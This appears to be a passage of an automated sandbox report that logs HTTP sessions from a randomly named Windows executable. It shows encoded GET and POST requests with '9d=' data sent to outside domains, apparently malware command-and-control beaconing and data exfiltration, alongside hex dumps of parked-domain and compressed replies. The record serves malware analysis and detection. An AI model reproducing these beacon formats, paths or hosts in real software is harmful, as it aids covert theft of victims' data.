53 38 54 4c 32 41 30 73 79 44 33 38 7a 71 48 7a 2f 6b 62 57 41 6f 6a 55 73 38 78 61 63 4c 6a 64 55 73 48 6f 2b 70 67 34 2b 30 4d 51 35 79 65 62 50 38 34 56 73 30 45 74 58 36 4a 63 4b 6c 51 44 6c 6e 69 49 43 4a 78 75 6a 30 36 47 34 41 6e 5a 5a 34 57 55 59 54 36 54 78 39 48 50 4e 47 6a 44 69 56 71 49 76 38 67 5a 39 5a 30 79 6d 6a 6b 4d 6b 52 70 59 31 6a 6d 6a [TRUNCATED] Data Ascii: 9d=txGZWh/o/586tybRp/BPjJehKzmJXud9PqUSc3V268RUys/Po9R8gqvsGAGi8C+5Ai6c9CrCmNDADEfZX+Ux43fWE6DxAOj94nFbhjCgcSVNXuaH1II2EMt2grmi+i4J78+tT69bwyKYaP4s0cvI8WlvzMqKXfXfxz7wYmmKJkBMd7HX/GOJLYxQtwu4GtOagmymKQ/xSftLKdYmA8+g7iMS8TL2A0syD38zqHz/kbWAojUs8xacLjdUsHo+pg4+0MQ5yebP84Vs0EtX6JcKlQDlniICJxuj06G4AnZZ4WUYT6Tx9HPNGjDiVqIv8gZ9Z0ymjkMkRpY1jmjHNC3Uo7R/CFLG/wd2ZWIQIEnQYzovh42riss4H7f4AQj/yWmHfZluwc3GgwmItoPqCo0/uT4Q6TZ21Vg7TVhNZ0b9RgSR/HWItXp/D0EvzlPppGPtM8I0FC6A+ikqAWD7RXn32eyVDaOQ+XbK98bk++dSQ2jCLD+bn4c8MhZU86SRWlb3q64GPXu1zAVTYyTorksVusLB/Aoh4hocjs7sMWjbpHMfKH04FWP8DPZ1+3N2EQg9OrGfIgAea1k2Jdi2kEOVR2+30e5fkUg7H+lyZSw+GBDDV3RuO11+AGDAI+82snQF0sWccCEqNKGeBOqbOpn+imtquLnuh+oRbxHB+Ov6l39G5pDtQnK0TMpU5qXhm2YrO8MmUesXn6hIkla65y3R3u2OFJ4paVeh7NaBUKmYLW45pZNskPLSxKWniXBZ3JdZfKR7zM+XHE1BdewkPD5g/eHiJ/2Ij0SU/yddcjUIILfnEHx/JToIkrpRIN2J8xp+l2sgUtROo4LdecEb2x6MJ933ImTj0vjAkABVZk25cT5DxdwUCDJ9nThbcsWh2eMqrpJVHdoMpUgtcHb6jHyUOksPA4AowjEhdAgdXKAoK5OKMujTTgZ8Ybx6h3RdSltJm9VzHDdj6DECte8Zuf6nezgTbILxnPBmJ3mN6QPHlMjprDmgl [TRUNCATED]
Jun 5, 2024 18:29:23.273221970 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 05 Jun 2024 16:29:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.24 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jun 5, 2024 18:29:23.273247957 CEST	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Jun 5, 2024 18:29:23.273262024 CEST	1236	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Jun 5, 2024 18:29:23.273279905 CEST	1236	IN	Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
Jun 5, 2024 18:29:23.273323059 CEST	878	IN	Data Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68 Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	49743	194.9.94.86	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:29:24.987701893 CEST	453	OUT	GET /r45o/?9d=gzu5VRbRlKcxtienrOg/vYWmVRq4TNxrFroidVFNmLFBxOvIucJSpLXaDw+Y+myNYDD7xGaCks3CSH70SMI2pnLhFLXOBLrZylJOsjWCWApEJOKs/ooDCJFxqK6p3RZXycGtf6I8hj/U&G0a=VFN0vBc0ol1ljnb0 HTTP/1.1 Host: www.torentreprenad.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Jun 5, 2024 18:29:25.861164093 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 05 Jun 2024 16:29:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.24 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jun 5, 2024 18:29:25.861207962 CEST	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Jun 5, 2024 18:29:25.861249924 CEST	1236	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Jun 5, 2024 18:29:25.861267090 CEST	1236	IN	Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
Jun 5, 2024 18:29:25.861306906 CEST	848	IN	Data Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68 Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
Jun 5, 2024 18:29:25.861323118 CEST	30	IN	Data Raw: 6e 74 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: nt --></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	49744	35.214.235.206	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:29:31.037743092 CEST	705	OUT	POST /4iea/ HTTP/1.1 Host: www.grecanici.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 215 Origin: http://www.grecanici.com Referer: http://www.grecanici.com/4iea/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 47 4e 6e 7a 74 59 4e 4f 73 6c 59 31 48 73 51 52 4b 62 74 33 77 7a 4f 53 34 74 45 79 4a 2f 34 51 6c 69 52 47 75 76 33 52 47 6d 6f 4a 38 41 73 48 44 79 4d 44 50 49 66 30 6c 63 54 50 48 61 67 6a 45 76 54 67 37 58 46 4d 6d 32 4e 48 2f 79 74 61 62 77 70 31 78 6a 57 58 54 50 75 45 65 62 5a 66 6d 6a 74 6c 36 4c 47 4e 32 6b 67 39 30 46 71 2f 6e 73 6b 4e 47 44 6e 58 49 4d 2b 64 4a 39 78 41 57 44 6d 77 46 64 6c 38 55 41 58 51 32 30 32 36 34 51 6e 67 6d 54 31 75 6b 72 6b 4b 7a 33 6a 56 71 4e 38 6f 39 4d 38 34 43 4b 79 6b 65 31 33 30 49 6e 62 50 39 41 6e 61 33 2f 77 38 7a 54 66 34 63 6f 6c 4f 79 35 61 6c 54 68 4e 42 52 6b 65 49 4a 77 3d 3d Data Ascii: 9d=GNnztYNOslY1HsQRKbt3wzOS4tEyJ/4QliRGuv3RGmoJ8AsHDyMDPIf0lcTPHagjEvTg7XFMm2NH/ytabwp1xjWXTPuEebZfmjtl6LGN2kg90Fq/nskNGDnXIM+dJ9xAWDmwFdl8UAXQ20264QngmT1ukrkKz3jVqN8o9M84CKyke130InbP9Ana3/w8zTf4colOy5alThNBRkeIJw==
Jun 5, 2024 18:29:31.862610102 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 05 Jun 2024 16:29:31 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Httpd: 1 Host-Header: 8441280b0c35cbc1147f8ba998a563a7 X-Proxy-Cache-Info: DT:1 Content-Encoding: br Data Raw: 33 37 32 30 0d 0a 55 57 47 21 8a 8a 5e 0f cb 0e 30 5c 93 7a 00 54 06 c6 ee 80 58 b6 e3 7a be fd ef 7b 7f 7e ce 7b 32 ba 85 43 da 67 69 87 c8 ff fc 32 2d 3b 3f ec 2c 57 31 51 3d 3d 40 c2 7d 41 01 94 ab fd ff b7 69 15 92 ec 01 74 67 1d ce 2e 87 1b 6f 04 00 31 71 de be ef bf f7 7b 7e 49 76 ef 97 e1 9c 92 ba fb 9c d2 a0 3c 28 37 da 0b 55 5f 55 35 65 b5 dd 2b 43 03 c1 20 c9 83 9e 45 0c 37 c9 19 c3 60 92 70 29 c8 82 0d 17 fe ff 7f ef e7 27 2d 87 8c 8c 3e 80 86 1f 21 87 84 52 06 50 be 67 cf b9 db 4f 69 8c e7 5c ce 6a 64 9b 09 1a dd b7 54 67 8f ea 9c d5 4c 0e 19 3b 63 dc 2a e2 74 19 f0 29 6b 03 46 d9 07 f2 d7 78 ad 79 5c df ed 3f 09 8a 05 01 f1 1a bc ff cb e4 3d 57 ec 60 d5 c1 c2 2f a9 f5 a7 60 93 c2 ff de d7 f7 5b fb 78 be e4 29 0d 08 2f 36 37 45 41 32 94 f9 e6 87 d5 83 9c 60 f6 2b e5 21 f1 d6 16 72 58 5c 49 f0 2f fe f4 ed 11 7f d0 b1 b8 b2 80 88 a4 c3 b6 5e 4c 64 9a 95 ff bb 16 43 b6 4e f2 c0 10 62 82 da 38 49 c0 c0 6f bf 93 1a 84 b4 f7 c5 d9 ed e3 37 38 8c 6c db b6 fd fa 8d 1c 85 0d de 7f 8a 8b b3 cf cf [TRUNCATED] Data Ascii: 3720UWG!^0\zTXz{~{2Cgi2-;?,W1Q==@}Aitg.o1q{~Iv<(7U_U5e+C E7`p)'->!RPgOi\jdTgL;ct)kFxy\?=W`/`[x)/67EA2`+!rX\I/^LdCNb8Io78lw^2gD1bAxV:6b7/g_[zYpoo/&7uP"M_w`'K(%s-?EOZ&H~;}}\|@Jfo\|E9V9*\pV_3~79do#+7oon:@M86?Nn}=pe7YXB2Gr]9>Nw?pfcqov D{bVBH8MC2&2S\~W\|oO 9lQR\|@1azCTnkj&KS`_@,JjOhed&y:7yyiINhYU_G~6`aa/e0SAti\|$uy
Jun 5, 2024 18:29:31.862623930 CEST	1236	IN	Data Raw: 0e 5f 12 82 a3 d0 99 8c cf 43 95 b8 7d b8 f0 6f d9 d2 6b c4 18 5d b7 b8 32 40 26 52 58 39 69 5d c2 5f a9 d4 c1 e1 67 03 49 e6 6f 9d ad f9 b8 25 93 d9 bf c4 f1 b3 56 d6 87 6f 7f 45 69 3d 53 0a 69 8c 72 58 1e 7b 2a db 55 1b 17 f7 09 25 90 8e 3c 93 Data Ascii: _C}ok]2@&RX9i]_gIo%VoEi=SirX{*U%<RZ\PcU4>a<\$&9:R^_-Xmew}Zo:keI66X2"rcV-K3x<k7oS-kl7gWT
Jun 5, 2024 18:29:31.862629890 CEST	1236	IN	Data Raw: cf d8 46 5c 02 d1 30 72 cb d5 bd ca f5 95 06 99 08 ec 95 2e d5 34 fe ed c5 a2 a0 52 e7 2b b3 b7 bd 6c 75 49 97 93 0f e7 12 b8 ed 51 25 31 d5 f1 91 32 60 54 52 0b f9 ce 5b d4 8e 18 25 53 b3 d6 5c b0 6c fc 35 c0 d4 31 c8 31 4c fb 5b 5e 19 c0 d4 f4 Data Ascii: F\0r.4R+luIQ%12`TR[%S\l511L[^:zl5Iu^3I-$}j4~6d;RE0`yHOL_kc`VTv3UMb4P~2QB)xQd1T#q\AUJa22
Jun 5, 2024 18:29:31.862679005 CEST	1236	IN	Data Raw: 4c fa 4f f3 25 b5 76 6b 4a fc ca fc dd dd d3 78 2d fa 57 cc 48 0d dd 57 f7 7a b7 fa cb 6a 91 13 de 7d 81 8c 19 df b5 cc f7 dc 97 d5 d8 a6 fc 6b b8 38 96 35 e3 36 cc bb d5 af e4 ed cd 7d 35 ef f6 2b 11 9c c3 d6 3b 30 76 fc c7 4a eb 9f 23 c7 79 09 Data Ascii: LO%vkJx-WHWzj}k856}5+;0vJ#y0;As<q;n~Asj]u:,{d4jQo??;~.{/D&f6}t_`vUiU7B04nGY$c'#ZkN
Jun 5, 2024 18:29:31.862687111 CEST	1236	IN	Data Raw: a4 35 7b a4 d6 23 7e 3f 95 64 2f 42 a5 dc b7 73 7b fc 63 e3 02 ac 7e 99 eb 5a 19 23 b9 1e 27 d6 47 fb b0 a6 81 54 33 43 aa 92 b1 c5 60 a8 ab 54 d2 44 a6 99 21 55 cb d0 82 91 2e 92 61 22 d1 48 0a 23 ab 81 40 57 8b 1a c8 33 92 c2 c4 6a a8 38 57 a9 Data Ascii: 5{#~?d/Bs{c~Z#'GT3C`TD!U.a"H#@W3j8Wx\| Hq\-i x2ofYLK23ZaXD!T3`!9&MH40:L#PRG~^ofYKV!A%MB5@a@
Jun 5, 2024 18:29:31.862804890 CEST	1236	IN	Data Raw: 48 f2 18 10 02 06 68 2f 48 95 b4 2f 02 60 25 7a de 68 2e c8 13 b4 af 2f 76 c3 6f 17 ff 54 fc 52 c1 81 71 e7 5f 76 64 18 18 04 30 4c 05 c0 90 e0 30 50 03 88 21 00 0c 09 0e 03 05 50 62 30 00 73 0d f2 04 ed df fd f2 67 90 a5 c0 5a 83 24 b7 da bf f5 Data Ascii: Hh/H/`%zh./voTRq_vd0L0P!Pb0sgZ$wIWD@$)1 ^i_+O\Uq4~A.?C@@Hh/H/$4ppWJw$)1 ^i_P$4
Jun 5, 2024 18:29:31.862812042 CEST	1236	IN	Data Raw: c8 1e df 29 fb 29 e8 ef fb 7f d0 4b e7 f3 4f 93 cc 67 b4 a0 01 f8 e4 34 69 40 cc 10 6a 09 0e a1 58 d2 84 98 21 54 13 10 48 8e 09 21 01 d1 01 b4 a8 01 21 01 d1 51 50 2c 1a 06 84 04 40 03 d0 92 76 54 67 ad 1d 27 3e 40 dc 6c 5d f1 5d 7d 15 fc d3 1f Data Ascii: ))KOg4i@jX!TH!!QP,@vTg'>@l]]}r&}v7[QU>Z:>q!3RCV2L[bR$H@t@h]4@M`J{yf\|6s{\|M,{_!W4SP3C%8bI\|@55@5hZt+K
Jun 5, 2024 18:29:31.862819910 CEST	1236	IN	Data Raw: d2 7a d9 f3 5b 9a 29 67 53 f9 4b da 43 53 1a 59 4b 7b 25 79 50 91 6e 22 bf d9 b6 09 f9 56 3c 5b e8 c1 b0 c4 66 45 b0 e7 a8 60 4b b5 85 96 e3 4b f7 ac 81 8e 63 4a 43 41 1b 4a 6c 38 48 96 91 7e 53 52 74 3b f5 8a b4 5b 45 b6 4c 74 9b 12 b0 9b 84 66 Data Ascii: z[)gSKCSYK{%yPn"V<[fE`KKcJCAJl8H~SRt;[ELtf#cZ4@Q-[B9-5e<hx!k"5 HH4$3!%"fLH@[SI;z-'=`dS)6'b=9E,)#k@hzI gBJDh
Jun 5, 2024 18:29:31.862996101 CEST	1236	IN	Data Raw: 8f 75 70 57 c3 7f 0d 56 a7 5e 25 af c4 ec 54 01 ff 78 62 3f 26 64 3e e6 d0 bf 47 db 98 ac 6f c9 76 db d1 2a 0b e3 b5 e5 29 ea 6e 2f 84 ee 3b 78 e4 fb 87 e5 7d 95 e8 b7 6e 5b 31 5e 72 b7 83 6a 86 04 66 0b bb 2b f3 f5 da 6a 1d cf 95 c4 8f b8 cf 01 Data Ascii: upWV^%Txb?&d>Gov)n/;x}n[1^rjf+j{{owG(9;2iFVy}~\|=R\is8M<{OOr2+78{[StkM5xLPckLHUtaI6HfTCNd!).5,K
Jun 5, 2024 18:29:31.863003969 CEST	1236	IN	Data Raw: 5f 40 ce a0 99 ac 06 ed 28 8c a8 7d 21 11 10 90 e0 98 90 02 90 5e af 20 a2 63 40 0a 04 a4 30 93 61 40 0a a4 68 43 61 24 ed cb 19 0b 2b 41 bf 5e 58 2a 3a 76 a5 1f ac 05 ed 28 8c a8 7d 79 9e 14 3c c3 0a ed 28 3c c5 1a b5 2f 67 80 d5 a0 1d 85 11 b5 Data Ascii: _@(}!^ c@0a@hCa$+A^X*:v(}y<(</g/$RDtHf2Hm(}9ca%KE/<tgz+\Qxv<j_zR R E#i_XXR+`-hGaDt'6RrPfiCB
Jun 5, 2024 18:29:31.867686033 CEST	1236	IN	Data Raw: 2b 9c 5b c4 b8 85 49 24 3e fa eb 34 1d 21 14 bd 45 2f 70 90 fb 31 90 bf b5 9b b4 20 e8 21 3f 92 6a ab 67 c8 d0 b4 1c 3d 2e c5 9c a2 f2 2f a3 75 ac ad 0d 2a 76 09 49 0a 8b 0f 41 0a c1 0c 83 d7 0a 25 c8 3b 77 f6 4f 25 b5 c1 26 45 ff 1a b4 b3 41 7b Data Ascii: +[I$>4!E/p1 !?jg=./u*vIA%;wO%&EA{\|{8b1d1r=Uy1MO?OuYw>?PK}bRI:>s9\|CO!`,y'C/U 'WvP\|x}',p(N7t6(S=!t[

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	49745	35.214.235.206	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:29:33.573555946 CEST	725	OUT	POST /4iea/ HTTP/1.1 Host: www.grecanici.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 235 Origin: http://www.grecanici.com Referer: http://www.grecanici.com/4iea/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 47 4e 6e 7a 74 59 4e 4f 73 6c 59 31 47 4d 67 52 4e 34 46 33 68 6a 4f 52 7a 4e 45 79 66 50 34 63 6c 69 74 47 75 71 48 2f 46 54 41 4a 35 52 63 48 43 33 67 44 49 49 66 30 71 38 54 4b 4b 36 67 38 45 76 4f 58 37 56 68 4d 6d 79 6c 48 2f 7a 64 61 62 6e 46 30 7a 7a 57 56 66 76 75 47 61 62 5a 66 6d 6a 74 6c 36 4c 53 6e 32 6c 45 39 30 31 36 2f 6d 4e 6b 4d 46 44 6e 55 59 73 2b 64 59 74 77 48 57 44 6e 6a 46 59 39 61 55 47 62 51 32 32 65 36 34 68 6e 76 74 54 31 6f 72 4c 6c 5a 79 46 69 35 6d 64 6b 63 6e 64 6b 31 4b 4e 75 7a 62 44 71 57 53 46 58 6a 6a 52 66 68 7a 39 55 4b 6b 31 43 4e 65 70 68 57 2f 62 75 45 4d 57 6f 72 63 32 2f 4d 66 49 61 34 6b 55 35 73 4a 78 53 6a 56 6e 76 54 44 33 6e 63 45 41 59 3d Data Ascii: 9d=GNnztYNOslY1GMgRN4F3hjORzNEyfP4clitGuqH/FTAJ5RcHC3gDIIf0q8TKK6g8EvOX7VhMmylH/zdabnF0zzWVfvuGabZfmjtl6LSn2lE9016/mNkMFDnUYs+dYtwHWDnjFY9aUGbQ22e64hnvtT1orLlZyFi5mdkcndk1KNuzbDqWSFXjjRfhz9UKk1CNephW/buEMWorc2/MfIa4kU5sJxSjVnvTD3ncEAY=
